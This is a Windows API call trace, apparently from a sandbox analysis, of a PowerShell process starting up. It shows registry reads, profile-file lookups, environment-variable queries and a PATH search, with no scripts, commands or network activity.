	[0837.787] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed5b8 | out: phkResult=0x1ed5b8*=0x38c) returned 0x0
	[0837.787] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed53c, lpData=0x0, lpcbData=0x1ed538*=0x0 | out: lpType=0x1ed53c*=0x1, lpData=0x0, lpcbData=0x1ed538*=0x56) returned 0x0
	[0837.787] CoTaskMemAlloc (cb=0x5a) returned 0x47ec90
	[0837.787] RegQueryValueExW (in: hKey=0x38c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ed50c, lpData=0x47ec90, lpcbData=0x1ed508*=0x56 | out: lpType=0x1ed50c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ed508*=0x56) returned 0x0
	[0837.787] CoTaskMemFree (pv=0x47ec90) 
	[0837.787] RegCloseKey (hKey=0x38c) returned 0x0
	[0837.788] CoTaskMemAlloc (cb=0x20c) returned 0x1b887970
	[0837.788] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b887970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0837.788] CoTaskMemFree (pv=0x1b887970) 
	[0837.788] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0837.788] CoTaskMemAlloc (cb=0x20c) returned 0x1b887970
	[0837.789] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b887970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0837.789] CoTaskMemFree (pv=0x1b887970) 
	[0837.789] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x1ed170, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0837.789] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0837.790] SetErrorMode (uMode=0x1) returned 0x1
	[0837.790] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed520 | out: lpFileInformation=0x1ed520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0840.032] SetErrorMode (uMode=0x1) returned 0x1
	[0840.032] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.033] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed520 | out: lpFileInformation=0x1ed520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.033] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed520 | out: lpFileInformation=0x1ed520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.033] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1ed310, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.033] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1ed520 | out: lpFileInformation=0x1ed520*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0840.033] SetErrorMode (uMode=0x1) returned 0x1
	[0840.034] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.034] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.034] CoTaskMemFree (pv=0x41f240) 
	[0840.035] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.035] CoTaskMemFree (pv=0x41f240) 
	[0840.035] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.035] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.035] CoTaskMemFree (pv=0x41f240) 
	[0840.036] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.036] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.036] CoTaskMemFree (pv=0x41f240) 
	[0840.041] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.041] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.041] CoTaskMemFree (pv=0x41f240) 
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x38c
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x390
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1c0
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x394
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0840.043] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0840.044] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0840.044] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0840.044] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0840.046] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.046] CoTaskMemFree (pv=0x41f240) 
	[0840.049] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0840.049] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1ed700 | out: lpMode=0x1ed700) returned 1
	[0840.144] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.144] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.144] CoTaskMemFree (pv=0x41f240) 
	[0840.148] SetEvent (hEvent=0x1c0) returned 1
	[0840.149] SetEvent (hEvent=0x38c) returned 1
	[0840.149] SetEvent (hEvent=0x390) returned 1
	[0840.149] SetEvent (hEvent=0x314) returned 1
	[0840.149] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x338
	[0840.151] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0840.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0840.152] CoTaskMemFree (pv=0x41f240) 
	[0840.153] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1ed458 | out: phkResult=0x1ed458*=0x398) returned 0x0
	[0840.153] RegQueryValueExW (in: hKey=0x398, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1ed3dc, lpData=0x0, lpcbData=0x1ed3d8*=0x0 | out: lpType=0x1ed3dc*=0x0, lpData=0x0, lpcbData=0x1ed3d8*=0x0) returned 0x2

Thread:
	id = 427
	os_tid = 0x1098


Thread:
	id = 430
	os_tid = 0x10a4


Thread:
	id = 1026
	os_tid = 0x1b40


Thread:
	id = 1028
	os_tid = 0x1b58


Thread:
	id = 1087
	os_tid = 0x15b0


Thread:
	id = 1119
	os_tid = 0x7c8


Thread:
	id = 1128
	os_tid = 0x398

	[0570.252] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0642.565] RegCloseKey (hKey=0x1c0) returned 0x0
	[0642.566] RegCloseKey (hKey=0x304) returned 0x0
	[0642.566] RegCloseKey (hKey=0x300) returned 0x0
	[0760.145] LocalFree (hMem=0x3c7290) returned 0x0
	[0760.145] RegCloseKey (hKey=0x314) returned 0x0
	[0760.145] LocalFree (hMem=0x3c72c0) returned 0x0
	[0760.146] CloseHandle (hObject=0x1c0) returned 1
	[0760.146] CloseHandle (hObject=0x13) returned 1
	[0760.147] CloseHandle (hObject=0xf) returned 1
	[0778.490] RegCloseKey (hKey=0x1c0) returned 0x0
	[0811.631] RegCloseKey (hKey=0x3a4) returned 0x0
	[0811.631] RegCloseKey (hKey=0x384) returned 0x0
	[0811.631] RegCloseKey (hKey=0x380) returned 0x0
	[0811.632] RegCloseKey (hKey=0x37c) returned 0x0
	[0811.632] RegCloseKey (hKey=0x378) returned 0x0
	[0811.632] RegCloseKey (hKey=0x374) returned 0x0
	[0811.632] RegCloseKey (hKey=0x370) returned 0x0
	[0811.633] RegCloseKey (hKey=0x36c) returned 0x0
	[0811.633] RegCloseKey (hKey=0x344) returned 0x0
	[0811.633] RegCloseKey (hKey=0x3a0) returned 0x0
	[0811.633] RegCloseKey (hKey=0x39c) returned 0x0
	[0811.634] RegCloseKey (hKey=0x364) returned 0x0
	[0811.634] RegCloseKey (hKey=0x360) returned 0x0
	[0811.634] RegCloseKey (hKey=0x35c) returned 0x0
	[0811.634] RegCloseKey (hKey=0x358) returned 0x0
	[0811.635] RegCloseKey (hKey=0x354) returned 0x0
	[0811.635] RegCloseKey (hKey=0x350) returned 0x0
	[0811.635] RegCloseKey (hKey=0x34c) returned 0x0
	[0811.636] RegCloseKey (hKey=0x348) returned 0x0
	[0811.636] RegCloseKey (hKey=0x398) returned 0x0
	[0811.636] RegCloseKey (hKey=0x338) returned 0x0
	[0811.636] RegCloseKey (hKey=0x334) returned 0x0
	[0811.637] RegCloseKey (hKey=0x330) returned 0x0
	[0811.637] RegCloseKey (hKey=0x32c) returned 0x0
	[0811.637] RegCloseKey (hKey=0x328) returned 0x0
	[0811.638] RegCloseKey (hKey=0x324) returned 0x0
	[0811.638] RegCloseKey (hKey=0x320) returned 0x0
	[0811.638] RegCloseKey (hKey=0x31c) returned 0x0
	[0811.638] RegCloseKey (hKey=0x394) returned 0x0
	[0811.639] RegCloseKey (hKey=0x1c0) returned 0x0
	[0811.639] RegCloseKey (hKey=0x314) returned 0x0
	[0811.639] RegCloseKey (hKey=0x390) returned 0x0
	[0811.639] RegCloseKey (hKey=0x38c) returned 0x0
	[0811.640] RegCloseKey (hKey=0x368) returned 0x0
	[0892.870] RegCloseKey (hKey=0x398) returned 0x0

Thread:
	id = 1180
	os_tid = 0xbbc


Thread:
	id = 1792
	os_tid = 0x234c

	[0841.380] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0841.389] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409
	[0841.394] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.394] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.394] CoTaskMemFree (pv=0x41f240) 
	[0841.396] VirtualQuery (in: lpAddress=0x1c82db00, lpBuffer=0x1c82e9c0, dwLength=0x30 | out: lpBuffer=0x1c82e9c0*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0841.400] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.400] CoTaskMemFree (pv=0x41f240) 
	[0841.402] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.403] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.403] CoTaskMemFree (pv=0x41f240) 
	[0841.407] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.407] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.407] CoTaskMemFree (pv=0x41f240) 
	[0841.417] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.417] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.417] CoTaskMemFree (pv=0x41f240) 
	[0841.419] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0841.419] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0841.419] CoTaskMemFree (pv=0x41f240) 
	[0843.742] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.742] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.742] CoTaskMemFree (pv=0x41f240) 
	[0843.750] VirtualQuery (in: lpAddress=0x1c82ddb0, lpBuffer=0x1c82ec70, dwLength=0x30 | out: lpBuffer=0x1c82ec70*(BaseAddress=0x1c82d000, AllocationBase=0x1bea0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0843.751] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.751] CoTaskMemFree (pv=0x41f240) 
	[0843.754] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.754] CoTaskMemFree (pv=0x41f240) 
	[0843.754] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.754] CoTaskMemFree (pv=0x41f240) 
	[0843.755] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.756] CoTaskMemFree (pv=0x41f240) 
	[0843.760] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0843.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.760] CoTaskMemFree (pv=0x41f240) 
	[0844.810] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.810] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.810] CoTaskMemFree (pv=0x41f240) 
	[0844.812] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.812] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.812] CoTaskMemFree (pv=0x41f240) 
	[0844.814] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.814] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.814] CoTaskMemFree (pv=0x41f240) 
	[0844.816] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.816] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.816] CoTaskMemFree (pv=0x41f240) 
	[0844.818] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.818] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.818] CoTaskMemFree (pv=0x41f240) 
	[0844.819] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0844.819] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0844.819] CoTaskMemFree (pv=0x41f240) 
	[0845.867] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0845.867] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.868] CoTaskMemFree (pv=0x41f240) 
	[0845.888] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0845.888] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0845.888] CoTaskMemFree (pv=0x41f240) 
	[0848.103] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0848.103] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0848.103] CoTaskMemFree (pv=0x41f240) 
	[0848.107] CoTaskMemAlloc (cb=0x104) returned 0x41f240
	[0848.107] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x41f240, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0848.107] CoTaskMemFree (pv=0x41f240) 
	[0848.107] CoTaskMemAlloc (cb=0x128) returned 0x4215e0
	[0848.107] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4215e0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0848.107] CoTaskMemFree (pv=0x4215e0) 
	[0848.112] CoTaskMemAlloc (cb=0x20e) returned 0x1b8895e0
	[0848.112] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8895e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0848.112] CoTaskMemFree (pv=0x1b8895e0) 
	[0848.119] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0848.120] SetErrorMode (uMode=0x1) returned 0x1
	[0848.123] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0849.123] SetErrorMode (uMode=0x1) returned 0x1
	[0849.124] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0849.125] SetErrorMode (uMode=0x1) returned 0x1
	[0849.125] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0851.135] SetErrorMode (uMode=0x1) returned 0x1
	[0851.136] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0851.137] SetErrorMode (uMode=0x1) returned 0x1
	[0851.137] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0851.145] SetErrorMode (uMode=0x1) returned 0x1
	[0851.147] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0851.147] SetErrorMode (uMode=0x1) returned 0x1
	[0851.147] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0851.159] SetErrorMode (uMode=0x1) returned 0x1
	[0851.160] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0851.160] SetErrorMode (uMode=0x1) returned 0x1
	[0851.160] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0851.169] SetErrorMode (uMode=0x1) returned 0x1
	[0852.754] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c82db40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0852.754] SetErrorMode (uMode=0x1) returned 0x1
	[0852.754] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c82dce0 | out: lpFindFileData=0x1c82dce0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0852.762] SetErrorMode (uMode=0x1) returned 0x1
